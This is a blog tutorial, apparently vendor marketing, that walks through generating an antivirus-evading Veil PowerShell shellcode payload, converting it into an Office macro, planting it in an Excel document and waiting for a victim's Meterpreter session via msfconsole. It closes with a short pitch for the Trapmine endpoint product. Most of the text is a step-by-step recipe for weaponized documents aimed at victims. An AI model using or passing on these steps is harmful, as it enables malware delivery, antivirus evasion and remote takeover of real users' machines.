Weaponizing MS Office Documents With Veil Powershell Payloads Bypassing Antivirusus and The Importance of Endpoint Security

Veil-Evasion tool coming with Kali Linux helps creating payloads capable of bypassing Anti Viruses. On this tutorial we are going to study creating a powershell payload with Veil and then embedding it into an Excel document to test it on an environment supported with MS Firewall, MS Defender and an Anti Virus tool with dynamic analysis options on. Let’s dive in:

First run the following command to start Veil:

python /usr/share/veil-evasion/Veil-Evasion.py

Veil Evasion

On coming screen type “list” to see available payloads:

Veil Payload List

Here type “25” to select “powershell/shellcode_inject/virtual” option. Then type “generate” to prepare the payload:

Veil Generate Payload

It is quite straightforward to generate the payload. Go with default options, type the IP and port of your attacking machine:

Veil Generate Shellcode

Once the payload is created, two files of interest are created. One for Payload File, and one for Handler File:

Veil Generate Shellcode

Okay, open with your favorite editor the created payload file: /var/lib/veil-evasion/output/source/payload.bat

Then copy the powershell command section as shown below (please click on the pictures to seem them better):

Payload

Let’s name it as input.bat as below:

Payload

To be able to use this powershell command, we need to convert it into VBS format (which is the Macro language of MS Office documents).

I used the safe_macro.py script by khi@sh. You can reach the code here. (I had to comment lines 54 and 55 to run the code for my case).

Safe Macro

Then you can copy and paste the generated code into your malicious Office document. That’s it, you’re done

Now you can open your listener handler with the following command and start waiting for your victim to open the document:

msfconsole -r /var/lib/veil-evasion/output/handlers/payload_handler.rc

Generate Handler

Your meterpreter session runs in the background. To call it just type “sessions -i 1”.

You’re in.

As you can see, with a very straightforward technique it is possible to bypass most of the Antiviruses and other mitigations. There are countless attacking and exploiting vectors and traditional defense mechanisms are obviously incapable of handling all of them.

Here I want to introduce you a Next Generation Endpoint Security Tool: Trapmine. Trapmine smartly hunts for exploitive behaviors and catches any malicious activity. Below you can how it catches the same Macro exploit we developed here on a Word document:

Trapmine Warning

You can learn about Trapmine here.